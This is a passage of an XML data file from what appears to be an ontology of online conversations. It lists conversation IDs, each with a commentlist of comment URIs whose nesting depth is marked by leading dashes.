---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280892
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287808
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284586
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279304
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280284
-----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280830
------http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291588
------http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289190
-------http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289738
--------http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289996
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279914
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.8</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278638
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.3</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279666
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30292100
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279892
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278890
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278900
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278936
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30307604
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279028
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285768
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279920
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281328
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280400
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280404
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.6</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278682
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279290
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.18</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279246
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280840
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.20</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279562
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280520
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.12</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278918
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.9</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278670
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.10</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278818
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.27</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278632
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.7</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279550
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283386
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278990
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279762
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281200
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278996
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279286
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.0</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280734
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279880
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279710
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280118
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280960
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279994
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297282
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279866
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280066
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283244
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.24</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283686
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283156
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280876
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.25</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279100
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281576
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285250
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.22</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279144
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282054
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.1</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279508
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281474
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281112
</commentlist>
</conversation>
